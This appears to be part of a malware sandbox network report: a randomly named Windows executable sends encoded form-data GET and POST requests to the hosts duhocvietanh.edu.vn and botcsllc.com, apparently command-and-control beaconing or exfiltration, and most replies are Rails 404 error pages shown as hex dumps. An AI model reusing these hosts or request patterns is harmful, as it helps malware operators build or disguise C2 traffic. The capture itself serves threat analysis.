                                          May 27, 2024 12:43:12.829783916 CEST1236INData Raw: 5b ff 12 9e f0 e6 17 72 cb 39 e9 7c 58 b0 80 89 80 5a 9f aa aa 68 ef 87 39 d3 8a 96 aa a5 89 d5 da e8 5d 2c 7c 3c 1e e3 ce 40 e7 54 21 a6 0b 63 51 a8 21 62 83 eb ed af ed bb 20 db fa fb 40 da fa d7 18 22 9f 0d 3e ff d6 e4 f1 53 ad 00 c1 1e 76 3b
                                          Data Ascii: [r9|XZh9],|<@T!cQ!b @">Sv;0,r{JqhI$bc9#:8vQ7b(~gGg#*>SX&<K;Lq=1Q|VgyrW4^<nWt*/\
                                          May 27, 2024 12:43:12.830502033 CEST3INData Raw: de dc 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.549719103.138.88.50806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:13.994642019 CEST510OUTGET /iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.duhocvietanh.edu.vn
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:43:15.274095058 CEST524INHTTP/1.1 301 Moved Permanently
                                          Connection: close
                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          cache-control: no-cache, must-revalidate, max-age=0
                                          content-type: text/html; charset=UTF-8
                                          x-redirect-by: WordPress
                                          location: http://duhocvietanh.edu.vn/iqzp/?4b34ht=fu92k1NC4wJFnZcipX/XbPhVhBhXF83hEHBnQGjO4gCDEIQAPcvMGFbAeujwAxJrjpsvX+qRkMbJbRaZT89LHtus1xeGcvR3FY7l2IYkKTCFrV4doYlBH8GHezxeD3NhTg==&UxF=2Nflznk0WJ3hjv
                                          content-length: 0
                                          date: Mon, 27 May 2024 10:43:10 GMT
                                          server: LiteSpeed
                                          vary: User-Agent,Accept-Encoding


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.549720216.40.34.41806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:21.455991030 CEST756OUTPOST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 61 54 67 4e 6c 77 36 41 6c 56 6d 33 67 4b 6e 49 6f 37 77 38 4d 35 65 51 35 72 42 6f 30 4a 5a 47 49 42 57 66 4a 5a 5a 46 43 48 6b 73 32 41 6d 35 50 61 32 31 38 63 39 65 52 62 51 31 71 65 4e 51 30 68 70 5a 73 42 67 2f 52 66 73 6d 47 55 44 31 4a 45 2b 62 52 75 6c 6d 33 6e 47 31 4f 2f 48 58 4d 4e 2f 65 6c 6f 44 32 77 39 43 35 78 45 51 61 54 4f 5a 73 74 68 58 4f 65 7a 6e 77 43 6a 74 53 6f 49 47 71 46 75 6d 59 6e 46 45 32 6a 65 4f 6b 53 50 53 4e 32 6f 6b 61 6c 6c 72 5a 4d 44 65 4b 31 78 55 73 50 65 42 77 31 79 2f 49 32 34 66 6e 6e 65 77 77 46 50 77 46 61 48 64 63 75 61 62 39 53 46 51 61 56 56 6b 3d
                                          Data Ascii: 4b34ht=aTgNlw6AlVm3gKnIo7w8M5eQ5rBo0JZGIBWfJZZFCHks2Am5Pa218c9eRbQ1qeNQ0hpZsBg/RfsmGUD1JE+bRulm3nG1O/HXMN/eloD2w9C5xEQaTOZsthXOeznwCjtSoIGqFumYnFE2jeOkSPSN2okallrZMDeK1xUsPeBw1y/I24fnnewwFPwFaHdcuab9SFQaVVk=
                                          May 27, 2024 12:43:21.972661972 CEST1236INHTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 7ccaf680-076e-406e-9082-2d4f4500fffa
                                          x-runtime: 0.038115
                                          content-length: 18203
                                          connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                          May 27, 2024 12:43:21.972676039 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                          May 27, 2024 12:43:21.972688913 CEST1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                          Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                          May 27, 2024 12:43:21.972695112 CEST1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                          Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                          May 27, 2024 12:43:21.972704887 CEST1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                          Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                          May 27, 2024 12:43:21.972712994 CEST1236INData Raw: 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22
                                          Data Ascii: _id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `cal
                                          May 27, 2024 12:43:21.972752094 CEST1236INData Raw: 32 3a 69 6e 20 60 70 72 6f 63 65 73 73 5f 63 6c 69 65 6e 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 32 31 22 20 68 72 65 66 3d 22
                                          Data Ascii: 2:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9) lib/puma/server.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="22" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:
                                          May 27, 2024 12:43:21.972758055 CEST1236INData Raw: 69 64 3d 22 36 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75 70 70 6f 72 74 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 76 65 5f 73 75 70 70 6f 72 74 2f 74 61 67 67 65 64 5f 6c 6f 67 67 69 6e 67 2e 72 62 3a 37 31 3a 69 6e 20 60
                                          Data Ascii: id="6" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:71:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `call&#39;</a><br><a class="trace-frames" d
                                          May 27, 2024 12:43:21.972770929 CEST1224INData Raw: 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 74 61 74 69 63 2e 72 62 3a 31 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65
                                          Data Ascii: h/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#39;</a><br><a class="trace-frames" data-frame-id="17" href="#">railties (5.2.6) lib/rails/engin
                                          May 27, 2024 12:43:21.972776890 CEST1236INData Raw: 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 74 61 72 67 65 74 20 3d 20 65 2e 74 61 72 67 65 74
                                          Data Ascii: r('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selectedFrame) { selectedFrame.className = selectedFrame.className.replace("selected", ""
                                          May 27, 2024 12:43:21.980973959 CEST684INData Raw: 3d 22 52 65 74 75 72 6e 73 20 61 6e 20 61 62 73 6f 6c 75 74 65 20 55 52 4c 20 28 77 69 74 68 20 74 68 65 20 68 74 74 70 20 61 6e 64 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 55 72 6c 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 2f 74 68 3e
                                          Data Ascii: ="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" placeholder="Path Match" type="search" name="path[]" /> </th> <th> </th> </tr


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.549721216.40.34.41806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:23.986085892 CEST776OUTPOST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 61 54 67 4e 6c 77 36 41 6c 56 6d 33 69 76 76 49 76 59 59 38 64 70 65 52 32 4c 42 6f 6d 4a 5a 43 49 42 53 66 4a 64 67 64 43 78 63 73 32 67 32 35 4f 62 32 31 2f 63 39 65 5a 37 51 73 33 4f 4e 5a 30 68 56 76 73 44 6b 2f 52 66 34 6d 47 56 7a 31 49 31 2b 59 58 2b 6c 65 37 48 47 33 51 50 48 58 4d 4e 2f 65 6c 6f 6d 6a 77 38 6d 35 79 30 4d 61 54 76 5a 76 7a 52 58 4e 5a 7a 6e 77 47 6a 74 4f 6f 49 47 44 46 73 43 69 6e 47 38 32 6a 61 4b 6b 53 38 4b 4d 6a 34 6c 52 72 46 71 6d 4a 77 2b 42 37 6a 6f 48 4f 2f 67 33 70 54 37 54 2b 75 79 4e 39 38 34 59 57 76 63 39 4b 55 56 72 2f 71 36 55 49 6d 41 71 4c 43 77 54 65 61 59 6c 79 63 72 35 69 66 31 30 2f 5a 4b 7a 6f 62 39 67
                                          Data Ascii: 4b34ht=aTgNlw6AlVm3ivvIvYY8dpeR2LBomJZCIBSfJdgdCxcs2g25Ob21/c9eZ7Qs3ONZ0hVvsDk/Rf4mGVz1I1+YX+le7HG3QPHXMN/elomjw8m5y0MaTvZvzRXNZznwGjtOoIGDFsCinG82jaKkS8KMj4lRrFqmJw+B7joHO/g3pT7T+uyN984YWvc9KUVr/q6UImAqLCwTeaYlycr5if10/ZKzob9g
                                          May 27, 2024 12:43:24.487472057 CEST1236INHTTP/1.1 404 Not Found
                                          content-type: text/html; charset=UTF-8
                                          x-request-id: 43bd9ea3-1f62-449d-8baa-5a20ee528cd2
                                          x-runtime: 0.024217
                                          content-length: 18223
                                          connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                          May 27, 2024 12:43:24.487493038 CEST1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                          Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                          May 27, 2024 12:43:24.487519026 CEST448INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                          Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                          May 27, 2024 12:43:24.487529039 CEST1236INData Raw: 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 32 70 78 20 53 6c 61 74
                                          Data Ascii: es { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none; } #route_table td
                                          May 27, 2024 12:43:24.487606049 CEST1236INData Raw: 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 41 70 70 6c 69 63 61 74 69 6f 6e 20 54 72 61 63 65 3c 2f
                                          Data Ascii: Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false;">Framework Trace</a> |
                                          May 27, 2024 12:43:24.487627029 CEST1236INData Raw: 20 69 6e 20 74 61 67 67 65 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 76 65 73 75
                                          Data Ascii: in tagged&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">activesupport (5.2.6) lib/active_support/tagged_logging.rb:28:in `tagged&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">activesupport (5.2.6) lib/active_
                                          May 27, 2024 12:43:24.487665892 CEST1236INData Raw: 65 2d 69 64 3d 22 31 34 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31
                                          Data Ascii: e-id="14" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><
                                          May 27, 2024 12:43:24.487689972 CEST1236INData Raw: 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 64 65 62 75 67 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 36 35 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61
                                          Data Ascii: tion_dispatch/middleware/debug_exceptions.rb:65:in `call&#39;</a><br><a class="trace-frames" data-frame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-f
                                          May 27, 2024 12:43:24.487713099 CEST1236INData Raw: 69 64 64 6c 65 77 61 72 65 2e 72 62 3a 31 39 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 30 22 20 68 72
                                          Data Ascii: iddleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">rack (2.2.3) l
                                          May 27, 2024 12:43:24.487735033 CEST1236INData Raw: 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 73 65 72 76 65 72 2e 72 62 3a 37 31 38 3a 69 6e 20 60 68 61 6e 64 6c 65 5f 72 65 71 75 65 73 74 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73
                                          Data Ascii: .3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9) lib/puma/server.rb:472:in `process_client&#39;</a><br><a class="trace-frames" data-frame-id="21" href="#">puma (4.3.9)
                                          May 27, 2024 12:43:24.492821932 CEST1236INData Raw: 66 72 61 6d 65 5f 69 64 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 66 72 61 6d 65 2d 73 6f 75 72 63 65 2d 27 20 2b 20 66 72 61 6d 65 5f 69 64 29 3b 0a
                                          Data Ascii: frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden"; el.className = el.className.replace(" hidden", ""); curren


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549722216.40.34.41806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:43:26.515472889 CEST1793OUTPOST /wouf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.botcsllc.com
                                          Origin: http://www.botcsllc.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.botcsllc.com/wouf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Raw: 34 62 33 34 68 74 3d 61 54 67 4e 6c 77 36 41 6c 56 6d 33 69 76 76 49 76 59 59 38 64 70 65 52 32 4c 42 6f 6d 4a 5a 43 49 42 53 66 4a 64 67 64 43 79 38 73 33 54 75 35 4f 34 65 31 2b 63 39 65 59 37 51 70 33 4f 4d 62 30 68 4e 7a 73 44 34 76 52 64 41 6d 63 32 37 31 41 68 53 59 65 2b 6c 65 7a 6e 47 32 4f 2f 48 43 4d 4e 50 61 6c 6f 32 6a 77 38 6d 35 79 31 38 61 61 65 5a 76 78 52 58 4f 65 7a 6e 33 43 6a 74 71 6f 49 2b 35 46 73 47 49 6e 32 63 32 74 65 75 6b 42 75 53 4d 69 59 6c 54 37 56 71 2b 4a 77 7a 5a 37 6e 49 68 4f 2f 45 52 70 55 33 54 76 66 33 4c 36 49 77 51 45 2f 4d 6b 4f 31 45 4d 70 38 37 77 57 51 41 38 42 54 52 78 64 4a 78 49 30 4d 62 72 33 75 4a 2b 69 75 61 47 6f 72 45 7a 72 66 32 73 41 2b 38 47 57 34 51 42 54 70 4e 4e 6a 31 4e 45 2b 63 44 76 6b 6d 53 41 6e 54 49 69 33 4b 72 71 55 4d 46 39 66 55 71 72 48 45 6f 45 4e 54 73 59 36 74 57 66 63 32 2b 62 42 61 4a 4d 4b 65 5a 61 6c 63 38 51 4b 4c 67 42 54 52 37 75 63 79 54 47 6f 43 63 75 42 6b 44 68 59 34 4a 4c 4e 2b 33 6a 43 68 62 30 2b 51 52 51 63 73 69 [TRUNCATED]
